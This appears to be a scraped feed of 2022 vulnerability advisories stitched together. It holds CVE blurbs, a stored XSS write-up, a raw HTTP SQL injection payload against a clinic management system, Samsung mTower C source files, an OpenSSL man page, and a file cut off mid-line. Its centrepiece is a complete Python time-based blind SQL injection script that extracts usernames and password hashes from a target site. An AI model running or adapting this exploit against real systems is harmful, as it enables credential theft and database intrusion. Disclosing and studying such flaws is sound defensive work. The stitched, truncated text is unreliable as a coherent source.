Apache IoTDB grafana-connector version 0.13.0 contains an interface without authorization, which may expose the internal structure of a database. Users should upgrade to version 0.13.1, which addresses this issue.

**Apache IoTDB grafana-connector contains an interface without authorization**

High severity GitHub Reviewed Published Sep 6, 2022 • Updated Sep 15, 2022

GHSA-c86f-9grv-pmqf: Apache IoTDB grafana-connector contains an interface without authorization

Online Market Place Site version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Online Market Place Site v1.0 - Stored Cross-Site Scripting (XSS)# Exploit Author: Joe Pollock# Date: September 03, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip# Tested on: Kali Linux, Apache, Mysql# CVE: CVE-2022-30003 (RESERVED)# Vendor: oretnom23# Version: v1.0# Exploit Description:#   Online Market Place Site v1.0 suffers from an authenticated stored Cross-Site Scripting (XSS) vulnerability allowing attackers to register#   as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.To reporduce:1. Sign as a Seller (or create an account) then add a product by navigating to 'Products' > 'Add New'.2. Add an XSS payload (e.g. <script>alert(1)</script>) within the 'Product Title' and/or 'Short Description' fields.3. Click 'SAVE' - the XSS payload(s) will be executed immediately or anytime the product is viewed.

Online Market Place Site 1.0 Cross Site Scripting

Online Market Place Site version 1.0 suffers from an unauthenticated blind SQL injection vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.

    # Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection# Exploit Author: Joe Pollock# Date: September 03, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip# Tested on: Kali Linux, Apache, Mysql# CVE: CVE-2022-30004 (RESERVED)# Vendor: oretnom23# Version: v1.0# Exploit Description:#   Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.#   This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.#   By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.#   Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.#   Ex: python3 omps.py 10.14.14.2import sys, requests, urllib3USERID=0def main():  if len(sys.argv) != 2:    print("(+) usage: %s <target>")  % sys.argv[0]    print('(+) eg: %s 192.168.121.103')  % sys.argv[0]    sys.exit(-1)  ip = sys.argv[1]  print("(+) Retrieving username and hash...")  target = "http://%s/omps/classes/Users.php?f=save_user" % ip    # Get username  for p in range (1,30):    injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)    for c in range(32, 126):      files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}      #print(injection_string.replace("[CHAR]", str(c)))      r = requests.post(target, files=files)      if (r.elapsed.total_seconds() > 2):        extracted_char = chr(c)        sys.stdout.write(extracted_char)        sys.stdout.flush()  sys.stdout.write("\t")    # Get password hash  for p in range (1,65):    injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)    for c in range(32, 126):      files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}      #print(injection_string.replace("[CHAR]", str(c)))      r = requests.post(target, files=files)      if (r.elapsed.total_seconds() > 2):        extracted_char = chr(c)        sys.stdout.write(extracted_char)        sys.stdout.flush()  print("\n(+) done!")    if __name__ == "__main__":  main()

Online Market Place Site 1.0 SQL Injection

A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file medicine_details.php. The manipulation of the argument medicine leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-207854 is the identifier assigned to this vulnerability.

**Clinic's Patient Management System - medicine\_details.php 'medicine' SQL inject****Exploit Title: Clinic's Patient Management System - medicine\_details.php 'medicine' SQL inject****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code****Software Link:https://www.sourcecodester.com/php-clinics-patient-management-system-source-code****Version: Loan Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Clinic's Patient Management System does not filter the content correctly at the "medicine\_details.php /medicine" parameter, resulting in the generation of SQL injection.

**Payload used:**

    POST /medicine_details.php HTTP/1.1
    Host: 192.168.31.35:8089
    Content-Length: 79
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.31.35:8089
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.31.35:8089/medicine_details.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lkdn1jvj1em9c4j3olu9e2pdpo
    Connection: close
    
    medicine=1 AND GTID_SUBSET(CONCAT(0,(SELECT user()),0),3619)&packing=11&submit=
    

**Proof of Concept**

1、After logging in, use the add medicine function to capture and analyze the traffic, and find that the program is in medicine\_details.php.

2、Looking at the source code, it is found that the password field is directly brought into the SQL statement query without filtering

3、During manual testing, it is found that SQL error reporting injection exists, so the sensitive information and permissions of the database can be obtained by using the error reporting

4、Through testing with the tool, it is found that there are other injection methods such as blind SQL time injection.

CVE-2022-3122: webray.com.cn/cpmssql.md at main · joinia/webray.com.cn

Apache IoTDB version 0.13.0 is vulnerable by session id attack. Users should upgrade to version 0.13.1 which addresses this issue.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-38369

Apache IoTDB grafana-connector version 0.13.0 contains an interface without authorization, which may expose the internal structure of database. Users should upgrade to version 0.13.1 which addresses this issue.

CVE-2022-38370

There is a NULL pointer dereference in aes256_encrypt in Samsung mTower through 0.3.0 due to a missing check on the return value of EVP_CIPHER_CTX_new.

/\*\* \* @file arch/arm/m2351/src/numaker\_pfm\_m2351/secure/main.c \* @brief Provides functionality to start secure world, initialize secure \* and normal worlds, pass to execution to normal world. \* \* @copyright Copyright (c) 2019 Samsung Electronics Co., Ltd. All Rights Reserved. \* @author Taras Drozdovskyi t.drozdovsky@samsung.com \* \* Licensed under the Apache License, Version 2.0 (the "License"); \* you may not use this file except in compliance with the License. \* You may obtain a copy of the License at \* \* http://www.apache.org/licenses/LICENSE-2.0 \* \* Unless required by applicable law or agreed to in writing, software \* distributed under the License is distributed on an "AS IS" BASIS, \* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. \* See the License for the specific language governing permissions and \* limitations under the License. \*/ /\* Included Files. \*/ #include <stdio.h\> #include <stdint.h\> #include <stdlib.h\> #include <string.h\> #include <openssl/sha.h\> //#include "config.h" //#include "version.h" #include <openssl/ec.h\> // for EC\_GROUP\_new\_by\_curve\_name, EC\_GROUP\_free, EC\_KEY\_new, EC\_KEY\_set\_group, EC\_KEY\_generate\_key, EC\_KEY\_free #include <openssl/ecdsa.h\> // for ECDSA\_do\_sign, ECDSA\_do\_verify #include <openssl/obj\_mac.h\> // for NID\_secp192k1 #include <stdlib.h\> #include <string.h\> #include <openssl/conf.h\> #include <openssl/evp.h\> #include <openssl/rand.h\> #include <openssl/err.h\> /\* Pre-processor Definitions. \*/ #define AES\_BLOCK\_SIZE 16 #define AES\_KEY\_SIZE 32 /\*\* Start address for non-secure boot image \*/ /\* Private Types. \*/ /\* Any types, enums, structures or unions used by the file are defined here. \*/ /\* typedef for NonSecure callback functions \*/ /\*\* \* @details ECC ECDSA key structure \*/ typedef struct { uint8\_t Qx\[32\]; /\* 256-bits \*/ uint8\_t Qy\[32\]; /\* 256-bits \*/ uint8\_t d\[32\]; /\* 256-bits \*/ }\_\_attribute\_\_((packed)) ECC\_KEY\_T; typedef struct \_AES\_DATA { unsigned char key\[AES\_KEY\_SIZE\]; unsigned char iv\[AES\_BLOCK\_SIZE\]; } AES\_DATA; typedef struct Message\_Struct { unsigned char \*body; int \*length; AES\_DATA \*aes\_settings; } Message; /\* Private Function Prototypes. \*/ /\* Prototypes of all static functions in the file are provided here. \*/ /\* Private Data. \*/ /\* All static data definitions appear here. \*/ uint32\_t key\[\] = { 0x78563412, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0xefcdac00 }; uint32\_t iv\[\] = { 0x78563412, 0x00000000, 0x00000000, 0xefcdac00 }; /\* Public Data. \*/ /\* All data definitions with global scope appear here. \*/ /\* Public Function Prototypes \*/ Message \*message\_init(int); int aes256\_init(Message \*); Message \*aes256\_encrypt(Message \*); void aes\_cleanup(AES\_DATA \*); void message\_cleanup(Message \*); void sha256(unsigned char \*data, unsigned int data\_len, unsigned char \*hash) { SHA256\_CTX sha256; SHA256\_Init(&sha256); SHA256\_Update(&sha256, data, data\_len); SHA256\_Final(hash, &sha256); } Message \*message\_init(int length) { Message \*ret = malloc(sizeof(Message)); ret->body = malloc(length); ret->length = malloc(sizeof(int)); \*ret->length = length; //initialize aes\_data aes256\_init(ret); return ret; } int aes256\_init(Message \* input) { AES\_DATA \*aes\_info = malloc(sizeof(AES\_DATA)); //point to new data input->aes\_settings = aes\_info; //get rand bytes memcpy(input->aes\_settings\->key, key, AES\_KEY\_SIZE); memcpy(input->aes\_settings\->iv, iv, AES\_KEY\_SIZE / 2); return 0; } Message \*aes256\_encrypt(Message \* plaintext) { EVP\_CIPHER\_CTX \*enc\_ctx; Message \* encrypted\_message; int enc\_length = \*(plaintext->length) + (AES\_BLOCK\_SIZE - \*(plaintext->length) % AES\_BLOCK\_SIZE); encrypted\_message = message\_init(enc\_length); //set up encryption context enc\_ctx = EVP\_CIPHER\_CTX\_new(); EVP\_EncryptInit(enc\_ctx, EVP\_aes\_256\_cfb(), plaintext->aes\_settings\->key, plaintext->aes\_settings\->iv); //encrypt all the bytes up to but not including the last block if (!EVP\_EncryptUpdate(enc\_ctx, encrypted\_message->body, &enc\_length, plaintext->body, \*plaintext->length)) { EVP\_CIPHER\_CTX\_cleanup(enc\_ctx); printf("EVP Error: couldn't update encryption with plain text!\\n"); return NULL; } //update length with the amount of bytes written \*(encrypted\_message->length) = enc\_length; //EncryptFinal will cipher the last block + Padding if (!EVP\_EncryptFinal\_ex(enc\_ctx, enc\_length + encrypted\_message->body, &enc\_length)) { EVP\_CIPHER\_CTX\_cleanup(enc\_ctx); printf("EVP Error: couldn't finalize encryption!\\n"); return NULL; } //add padding to length \*(encrypted\_message->length) += enc\_length; //no errors, copy over key & iv rather than pointing to the plaintext msg memcpy(encrypted\_message->aes\_settings\->key, plaintext->aes\_settings\->key, AES\_KEY\_SIZE); memcpy(encrypted\_message->aes\_settings\->iv, plaintext->aes\_settings\->iv, AES\_KEY\_SIZE / 2); //Free context and return encrypted message EVP\_CIPHER\_CTX\_cleanup(enc\_ctx); return encrypted\_message; } void aes\_cleanup(AES\_DATA \*aes\_data) { // free(aes\_data -> iv); // free(aes\_data -> key); // free(aes\_data); } void message\_cleanup(Message \*message) { //free message struct aes\_cleanup(message->aes\_settings); free(message->length); free(message->body); free(message); } /\*\* \* @brief main - entry point of mTower: secure world. \* \* @param None \* \* @returns None (function is not supposed to return) \*/ int main(int argc, char \* argv\[\]) { // Initialize openSSL // ERR\_load\_crypto\_strings(); // OpenSSL\_add\_all\_algorithms(); // OPENSSL\_config(NULL); EC\_KEY \*eckey = EC\_KEY\_new(); if (NULL == eckey) { printf("Failed to create new EC Key\\n"); return -1; } EC\_GROUP \*ecgroup = EC\_GROUP\_new\_by\_curve\_name(NID\_X9\_62\_prime256v1); if (NULL == ecgroup) { printf("Failed to create new EC Group\\n"); return -1; } if (EC\_KEY\_set\_group(eckey, ecgroup) != 1 ) { printf("Failed to set group for EC Key\\n"); return -1; } if (EC\_KEY\_generate\_key(eckey) != 1) { printf("Failed to generate EC Key\\n"); return -1; } const BIGNUM\* d = EC\_KEY\_get0\_private\_key(eckey); const EC\_POINT\* Q = EC\_KEY\_get0\_public\_key(eckey); const EC\_GROUP\* group = EC\_KEY\_get0\_group(eckey); BIGNUM\* x = BN\_new(); BIGNUM\* y = BN\_new(); if (!EC\_POINT\_get\_affine\_coordinates\_GFp(group, Q, x, y, NULL)) { return -1; } // printf("d: %s\\n", BN\_bn2hex(d)); // printf("X: %s\\n", BN\_bn2hex(x)); // printf("Y: %s\\n", BN\_bn2hex(y)); ECC\_KEY\_T ecc\_ecdsa\_key; BN\_bn2bin(d, &ecc\_ecdsa\_key.d\[0\]); BN\_bn2bin(x, ecc\_ecdsa\_key.Qx); BN\_bn2bin(y, ecc\_ecdsa\_key.Qy); // for (int i = 0; i != 32; i++) // printf(" %02X",ecc\_ecdsa\_key.d\[i\]); // printf("\\n"); char\* buff; buff = malloc(strlen(argv\[1\]) + strlen("ecdsa\_keys.bin") + 1); buff\[0\] = 0; strcat(buff, argv\[1\]); strcat(buff, "ecdsa\_keys.bin"); FILE\* fd = fopen(buff, "wb"); if (!fd) { printf("Failed to open file\\n"); free(buff); return -1; } free(buff); if (fwrite((void \*) &ecc\_ecdsa\_key, sizeof(char), (size\_t) (sizeof(ECC\_KEY\_T)), fd) != (size\_t) (sizeof(ECC\_KEY\_T))) { fclose(fd); return -1; } fclose(fd); Message \*message, \*enc\_msg; message = message\_init(64); memcpy((char \*) message->body, (unsigned char \*) ecc\_ecdsa\_key.Qx, 64); enc\_msg = aes256\_encrypt(message); //clean up ssl; // EVP\_cleanup(); // CRYPTO\_cleanup\_all\_ex\_data(); //Stop data leaks // ERR\_free\_strings(); buff = malloc(strlen(argv\[1\]) + strlen("NuBL32PubKeyEncrypted.bin") + 1); buff\[0\] = 0; strcat(buff, argv\[1\]); strcat(buff, "NuBL32PubKeyEncrypted.bin"); fd = fopen(buff, "wb"); if (!fd) { printf("Failed to open file\\n"); free(buff); return -1; } free(buff); if (fwrite((void \*) enc\_msg->body, sizeof(char), 64, fd) != 64) { fclose(fd); return -1; } fclose(fd); // free(buff); // message\_cleanup(message); // message\_cleanup(enc\_msg); buff = malloc(strlen(argv\[1\]) + strlen("NuBL32PubKeyEncryptedHash.bin") + 1); buff\[0\] = 0; strcat(buff, argv\[1\]); strcat(buff, "NuBL32PubKeyEncryptedHash.bin"); fd = fopen(buff, "wb"); if (!fd) { printf("Failed to open file\\n"); free(buff); return -1; } free(buff); unsigned char PubKeyEncryptedHash\[64\]; sha256((void \*) enc\_msg->body, 64, (unsigned char \*) PubKeyEncryptedHash); if (fwrite((void \*) PubKeyEncryptedHash, sizeof(char), 32, fd) != 32) { fclose(fd); return -1; } fclose(fd); message = message\_init(64); memcpy((char \*) message->body, (unsigned char \*) ecc\_ecdsa\_key.Qx, 64); enc\_msg = aes256\_encrypt(message); //clean up ssl; // EVP\_cleanup(); // CRYPTO\_cleanup\_all\_ex\_data(); //Stop data leaks // ERR\_free\_strings(); buff = malloc(strlen(argv\[1\]) + strlen("NuBL33PubKeyEncrypted.bin") + 1); buff\[0\] = 0; strcat(buff, argv\[1\]); strcat(buff, "NuBL33PubKeyEncrypted.bin"); fd = fopen(buff, "wb"); if (!fd) { printf("Failed to open file\\n"); free(buff); return -1; } free(buff); if (fwrite((void \*) enc\_msg->body, sizeof(char), 64, fd) != 64) { fclose(fd); return -1; } fclose(fd); // free(buff); // message\_cleanup(message); // message\_cleanup(enc\_msg); buff = malloc(strlen(argv\[1\]) + strlen("NuBL33PubKeyEncryptedHash.bin") + 1); buff\[0\] = 0; strcat(buff, argv\[1\]); strcat(buff, "NuBL33PubKeyEncryptedHash.bin"); fd = fopen(buff, "wb"); if (!fd) { printf("Failed to open file\\n"); free(buff); return -1; } free(buff); // unsigned char PubKeyEncryptedHash\[64\]; sha256((void \*) enc\_msg->body, 64, (unsigned char \*) PubKeyEncryptedHash); if (fwrite((void \*) PubKeyEncryptedHash, sizeof(char), 32, fd) != 32) { fclose(fd); return -1; } fclose(fd); exit: BN\_free(x); BN\_free(y); EC\_GROUP\_free(ecgroup); EC\_KEY\_free(eckey); // clean up ssl; // EVP\_cleanup(); // CRYPTO\_cleanup\_all\_ex\_data(); //Stop data leaks // ERR\_free\_strings(); return 0; }

CVE-2022-39829: mTower/ecdsa_keygen.c at 18f4b592a8a973ce5972f4e2658ea0f6e3686284 · Samsung/mTower

sign_pFwInfo in Samsung mTower through 0.3.0 has a missing check on the return value of EC_KEY_set_private_key, leading to a denial of service.

**NAME**

EVP\_EC\_gen, EC\_KEY\_get\_method, EC\_KEY\_set\_method, EC\_KEY\_new\_ex, EC\_KEY\_new, EC\_KEY\_get\_flags, EC\_KEY\_set\_flags, EC\_KEY\_clear\_flags, EC\_KEY\_new\_by\_curve\_name\_ex, EC\_KEY\_new\_by\_curve\_name, EC\_KEY\_free, EC\_KEY\_copy, EC\_KEY\_dup, EC\_KEY\_up\_ref, EC\_KEY\_get0\_engine, EC\_KEY\_get0\_group, EC\_KEY\_set\_group, EC\_KEY\_get0\_private\_key, EC\_KEY\_set\_private\_key, EC\_KEY\_get0\_public\_key, EC\_KEY\_set\_public\_key, EC\_KEY\_get\_conv\_form, EC\_KEY\_set\_conv\_form, EC\_KEY\_set\_asn1\_flag, EC\_KEY\_decoded\_from\_explicit\_params, EC\_KEY\_precompute\_mult, EC\_KEY\_generate\_key, EC\_KEY\_check\_key, EC\_KEY\_set\_public\_key\_affine\_coordinates, EC\_KEY\_oct2key, EC\_KEY\_key2buf, EC\_KEY\_oct2priv, EC\_KEY\_priv2oct, EC\_KEY\_priv2buf - Functions for creating, destroying and manipulating EC\_KEY objects

**SYNOPSIS**

    #include <openssl/ec.h>
    
    EVP_PKEY *EVP_EC_gen(const char *curve);

The following functions have been deprecated since OpenSSL 3.0, and can be hidden entirely by defining **OPENSSL\_API\_COMPAT** with a suitable version value, see openssl\_user\_macros(7):

    EC_KEY *EC_KEY_new_ex(OSSL_LIB_CTX *ctx, const char *propq);
    EC_KEY *EC_KEY_new(void);
    int EC_KEY_get_flags(const EC_KEY *key);
    void EC_KEY_set_flags(EC_KEY *key, int flags);
    void EC_KEY_clear_flags(EC_KEY *key, int flags);
    EC_KEY *EC_KEY_new_by_curve_name_ex(OSSL_LIB_CTX *ctx, const char *propq,
                                        int nid);
    EC_KEY *EC_KEY_new_by_curve_name(int nid);
    void EC_KEY_free(EC_KEY *key);
    EC_KEY *EC_KEY_copy(EC_KEY *dst, const EC_KEY *src);
    EC_KEY *EC_KEY_dup(const EC_KEY *src);
    int EC_KEY_up_ref(EC_KEY *key);
    ENGINE *EC_KEY_get0_engine(const EC_KEY *eckey);
    const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key);
    int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group);
    const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key);
    int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *priv_key);
    const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key);
    int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub);
    point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key);
    void EC_KEY_set_conv_form(EC_KEY *eckey, point_conversion_form_t cform);
    void EC_KEY_set_asn1_flag(EC_KEY *eckey, int asn1_flag);
    int EC_KEY_decoded_from_explicit_params(const EC_KEY *key);
    int EC_KEY_generate_key(EC_KEY *key);
    int EC_KEY_check_key(const EC_KEY *key);
    int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x, BIGNUM *y);
    const EC_KEY_METHOD *EC_KEY_get_method(const EC_KEY *key);
    int EC_KEY_set_method(EC_KEY *key, const EC_KEY_METHOD *meth);
    
    int EC_KEY_oct2key(EC_KEY *eckey, const unsigned char *buf, size_t len, BN_CTX *ctx);
    size_t EC_KEY_key2buf(const EC_KEY *eckey, point_conversion_form_t form,
                          unsigned char **pbuf, BN_CTX *ctx);
    
    int EC_KEY_oct2priv(EC_KEY *eckey, const unsigned char *buf, size_t len);
    size_t EC_KEY_priv2oct(const EC_KEY *eckey, unsigned char *buf, size_t len);
    
    size_t EC_KEY_priv2buf(const EC_KEY *eckey, unsigned char **pbuf);
    int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx);

**DESCRIPTION**

EVP\_EC\_gen() generates a new EC key pair on the given _curve_.

All of the functions described below are deprecated. Applications should instead use EVP\_EC\_gen(), EVP\_PKEY\_Q\_keygen(3), or EVP\_PKEY\_keygen\_init(3) and EVP\_PKEY\_keygen(3).

An EC\_KEY represents a public key and, optionally, the associated private key. A new EC\_KEY with no associated curve can be constructed by calling EC\_KEY\_new\_ex() and specifying the associated library context in _ctx_ (see OSSL\_LIB\_CTX(3)) and property query string _propq_. The _ctx_ parameter may be NULL in which case the default library context is used. The reference count for the newly created EC\_KEY is initially set to 1. A curve can be associated with the EC\_KEY by calling EC\_KEY\_set\_group().

EC\_KEY\_new() is the same as EC\_KEY\_new\_ex() except that the default library context is always used.

Alternatively a new EC\_KEY can be constructed by calling EC\_KEY\_new\_by\_curve\_name\_ex() and supplying the nid of the associated curve, the library context to be used _ctx_ (see OSSL\_LIB\_CTX(3)) and any property query string _propq_. The _ctx_ parameter may be NULL in which case the default library context is used. The _propq_ value may also be NULL. See EC\_GROUP\_new(3) for a description of curve names. This function simply wraps calls to EC\_KEY\_new\_ex() and EC\_GROUP\_new\_by\_curve\_name\_ex().

EC\_KEY\_new\_by\_curve\_name() is the same as EC\_KEY\_new\_by\_curve\_name\_ex() except that the default library context is always used and a NULL property query string.

Calling EC\_KEY\_free() decrements the reference count for the EC\_KEY object, and if it has dropped to zero then frees the memory associated with it. If _key_ is NULL nothing is done.

EC\_KEY\_copy() copies the contents of the EC\_KEY in _src_ into _dest_.

EC\_KEY\_dup() creates a new EC\_KEY object and copies _ec\_key_ into it.

EC\_KEY\_up\_ref() increments the reference count associated with the EC\_KEY object.

EC\_KEY\_get0\_engine() returns a handle to the ENGINE that has been set for this EC\_KEY object.

EC\_KEY\_generate\_key() generates a new public and private key for the supplied _eckey_ object. _eckey_ must have an EC\_GROUP object associated with it before calling this function. The private key is a random integer (0 < priv\_key < order, where _order_ is the order of the EC\_GROUP object). The public key is an EC\_POINT on the curve calculated by multiplying the generator for the curve by the private key.

EC\_KEY\_check\_key() performs various sanity checks on the EC\_KEY object to confirm that it is valid.

EC\_KEY\_set\_public\_key\_affine\_coordinates() sets the public key for _key_ based on its affine co-ordinates; i.e., it constructs an EC\_POINT object based on the supplied _x_ and _y_ values and sets the public key to be this EC\_POINT. It also performs certain sanity checks on the key to confirm that it is valid.

The functions EC\_KEY\_get0\_group(), EC\_KEY\_set\_group(), EC\_KEY\_get0\_private\_key(), EC\_KEY\_set\_private\_key(), EC\_KEY\_get0\_public\_key(), and EC\_KEY\_set\_public\_key() get and set the EC\_GROUP object, the private key, and the EC\_POINT public key for the **key** respectively. The function EC\_KEY\_set\_private\_key() accepts NULL as the priv\_key argument to securely clear the private key component from the EC\_KEY.

The functions EC\_KEY\_get\_conv\_form() and EC\_KEY\_set\_conv\_form() get and set the point\_conversion\_form for the _key_. For a description of point\_conversion\_forms please see EC\_POINT\_new(3).

EC\_KEY\_set\_flags() sets the flags in the _flags_ parameter on the EC\_KEY object. Any flags that are already set are left set. The flags currently defined are EC\_FLAG\_NON\_FIPS\_ALLOW and EC\_FLAG\_FIPS\_CHECKED. In addition there is the flag EC\_FLAG\_COFACTOR\_ECDH which is specific to ECDH. EC\_KEY\_get\_flags() returns the current flags that are set for this EC\_KEY. EC\_KEY\_clear\_flags() clears the flags indicated by the _flags_ parameter; all other flags are left in their existing state.

EC\_KEY\_set\_asn1\_flag() sets the asn1\_flag on the underlying EC\_GROUP object (if set). Refer to EC\_GROUP\_copy(3) for further information on the asn1\_flag.

EC\_KEY\_decoded\_from\_explicit\_params() returns 1 if the group of the _key_ was decoded from data with explicitly encoded group parameters, -1 if the _key_ is NULL or the group parameters are missing, and 0 otherwise.

EC\_KEY\_precompute\_mult() stores multiples of the underlying EC\_GROUP generator for faster point multiplication. See also EC\_POINT\_add(3). Modern versions should instead switch to named curves which OpenSSL has hardcoded lookup tables for.

EC\_KEY\_oct2key() and EC\_KEY\_key2buf() are identical to the functions EC\_POINT\_oct2point() and EC\_POINT\_point2buf() except they use the public key EC\_POINT in _eckey_.

EC\_KEY\_oct2priv() and EC\_KEY\_priv2oct() convert between the private key component of _eckey_ and octet form. The octet form consists of the content octets of the _privateKey_ OCTET STRING in an _ECPrivateKey_ ASN.1 structure.

The function EC\_KEY\_priv2oct() must be supplied with a buffer long enough to store the octet form. The return value provides the number of octets stored. Calling the function with a NULL buffer will not perform the conversion but will just return the required buffer length.

The function EC\_KEY\_priv2buf() allocates a buffer of suitable length and writes an EC\_KEY to it in octet format. The allocated buffer is written to _\*pbuf_ and its length is returned. The caller must free up the allocated buffer with a call to OPENSSL\_free(). Since the allocated buffer value is written to _\*pbuf_ the _pbuf_ parameter **MUST NOT** be **NULL**.

EC\_KEY\_priv2buf() converts an EC\_KEY private key into an allocated buffer.

**RETURN VALUES**

EC\_KEY\_new\_ex(), EC\_KEY\_new(), EC\_KEY\_new\_by\_curve\_name\_ex(), EC\_KEY\_new\_by\_curve\_name() and EC\_KEY\_dup() return a pointer to the newly created EC\_KEY object, or NULL on error.

EC\_KEY\_get\_flags() returns the flags associated with the EC\_KEY object as an integer.

EC\_KEY\_copy() returns a pointer to the destination key, or NULL on error.

EC\_KEY\_get0\_engine() returns a pointer to an ENGINE, or NULL if it wasn't set.

EC\_KEY\_up\_ref(), EC\_KEY\_set\_group(), EC\_KEY\_set\_public\_key(), EC\_KEY\_precompute\_mult(), EC\_KEY\_generate\_key(), EC\_KEY\_check\_key(), EC\_KEY\_set\_public\_key\_affine\_coordinates(), EC\_KEY\_oct2key() and EC\_KEY\_oct2priv() return 1 on success or 0 on error.

EC\_KEY\_set\_private\_key() returns 1 on success or 0 on error except when the priv\_key argument is NULL, in that case it returns 0, for legacy compatibility, and should not be treated as an error.

EC\_KEY\_get0\_group() returns the EC\_GROUP associated with the EC\_KEY.

EC\_KEY\_get0\_private\_key() returns the private key associated with the EC\_KEY.

EC\_KEY\_get\_conv\_form() return the point\_conversion\_form for the EC\_KEY.

EC\_KEY\_key2buf(), EC\_KEY\_priv2oct() and EC\_KEY\_priv2buf() return the length of the buffer or 0 on error.

**SEE ALSO**

EVP\_PKEY\_Q\_keygen(3) crypto(7), EC\_GROUP\_new(3), EC\_GROUP\_copy(3), EC\_POINT\_new(3), EC\_POINT\_add(3), EC\_GFp\_simple\_method(3), d2i\_ECPKParameters(3), OSSL\_LIB\_CTX(3)

**HISTORY**

EVP\_EC\_gen() was added in OpenSSL 3.0. All other functions described here were deprecated in OpenSSL 3.0. For replacement see EVP\_PKEY-EC(7).

**COPYRIGHT**

Copyright 2013-2021 The OpenSSL Project Authors. All Rights Reserved.

Licensed under the Apache License 2.0 (the "License"). You may not use this file except in compliance with the License. You can obtain a copy in the file LICENSE in the source distribution or at https://www.openssl.org/source/license.html.

CVE-2022-39828: /docs/manmaster/man3/EC_KEY_set_private_key.html

sign_pFwInfo in Samsung mTower through 0.3.0 has a missing check on the return value of EC_KEY_set_public_key_affine_coordinates, leading to a denial of service.

/\*\* \* @file tools/fwinfogen.c \* @brief . \* \* @copyright Copyright (c) 2019 Samsung Electronics Co., Ltd. All Rights Reserved. \* @author Taras Drozdovskyi t.drozdovsky@samsung.com \* \* Licensed under the Apache License, Version 2.0 (the "License"); \* you may not use this file except in compliance with the License. \* You may obtain a copy of the License at \* \* http://www.apache.org/licenses/LICENSE-2.0 \* \* Unless required by applicable law or agreed to in writing, software \* distributed under the License is distributed on an "AS IS" BASIS, \* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. \* See the License for the specific language governing permissions and \* limitations under the License. \*/ /\* Included Files. \*/ #include <stdio.h\> #include <stdint.h\> #include <stdlib.h\> #include <string.h\> #include <openssl/sha.h\> #include <openssl/ec.h\> // for EC\_GROUP\_new\_by\_curve\_name, EC\_GROUP\_free, EC\_KEY\_new, EC\_KEY\_set\_group, EC\_KEY\_generate\_key, EC\_KEY\_free #include <openssl/ecdsa.h\> // for ECDSA\_do\_sign, ECDSA\_do\_verify #include <openssl/obj\_mac.h\> // for NID\_secp192k1 #include "config.h" //#include "version.h" /\* Pre-processor Definitions. \*/ #define BUILD\_MONTH\_IS\_JAN (\_\_DATE\_\_\[0\] == 'J' && \_\_DATE\_\_\[1\] == 'a' && \_\_DATE\_\_\[2\] == 'n') #define BUILD\_MONTH\_IS\_FEB (\_\_DATE\_\_\[0\] == 'F') #define BUILD\_MONTH\_IS\_MAR (\_\_DATE\_\_\[0\] == 'M' && \_\_DATE\_\_\[1\] == 'a' && \_\_DATE\_\_\[2\] == 'r') #define BUILD\_MONTH\_IS\_APR (\_\_DATE\_\_\[0\] == 'A' && \_\_DATE\_\_\[1\] == 'p') #define BUILD\_MONTH\_IS\_MAY (\_\_DATE\_\_\[0\] == 'M' && \_\_DATE\_\_\[1\] == 'a' && \_\_DATE\_\_\[2\] == 'y') #define BUILD\_MONTH\_IS\_JUN (\_\_DATE\_\_\[0\] == 'J' && 